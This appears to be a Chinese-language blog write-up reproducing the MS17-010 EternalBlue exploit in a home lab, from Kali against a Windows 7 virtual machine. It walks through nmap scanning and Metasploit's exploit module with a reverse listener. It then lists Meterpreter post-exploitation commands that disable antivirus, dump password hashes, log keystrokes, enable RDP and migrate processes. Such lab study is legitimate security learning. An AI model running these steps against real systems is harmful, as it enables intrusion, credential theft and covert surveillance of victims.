漏洞简介:
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
漏洞原理:
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
(详细请看大佬的文章【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞_If you can take it, you can make it.-CSDN博客_ms17-010漏洞)
复现过程:
(1)环境搭建:windows7(Windows Vista、Win8、Win XP、Windows server 2003等也可,镜像可以到系统之家那里下载系统镜像iso下载_系统之家iso镜像下载http://www.xitongiso.com/)
(2)复现过程:
打开kali和win7;用nmap扫描同一子网的的靶机,发现目标靶机并且有靶机打开了我们需要利用的445端口
启动metaspoit
搜索ms17-010模块:search ms17-010
从搜素结果可以看出有辅助模块(auxiliary)和攻击模块(exploit)可供选择,先试试辅助模块
用use+模块编号选用模块,设立目标靶机ip:set rhost +ip;执行:run发现目标靶机是易受到ms17-010漏洞攻击的 ,转用攻击模块进行攻击
set lhost +ip设立攻击端
set lport +port 设立监听端口
到这里漏洞已经算是复现成功了,接下来是利用漏洞获取更多的靶机信息并进一步扩大施展空间
比如:
screenshot:靶机屏幕截屏并保存到root中
sysinfo:获取靶机系统信息
idletime:靶机开机时间
getuid:查看靶机用户名及其权限(因为主要是为了复现漏洞,所以设置虚拟机时我的window7是能从简就从简的,也就没有设置系统用户名及密码,更没有安装啥杀毒软件)
run post/windows/manage/enable_rdp:打开远程桌面服务
run post/windows/manage/killav:关闭杀毒软件
run hashdump:查看系统账户密码的hash值
keyscan_start 开启记录目标主机的键盘输入
keyscan_dump 输出截获到的目标键盘输入字符信息
keyscan_stop 停止键盘记录
shell:获取shell
一下子就成功了,但这个获取的shell很快就died了,网上寻找寻找解决办法,了解到一个进程转换延长shell寿命的方法
相关命令:
ps:查看靶机正在运行的进程
getpid:查看meterpreter shell的进程号
migrate +稳定进程号:转移进程
也可以直接用run post/windows/manage/migrate进行自动寻找稳定进程转换。
总结:
漏洞复现总的来说很简单,毕竟是站在巨人的肩膀上,kali上的工具已经为复现做足了准备,主要收获还是meterpreter模块之后的渗透攻击学习,了解了一些以前没见过的命令,算是加深了对kali的使用吧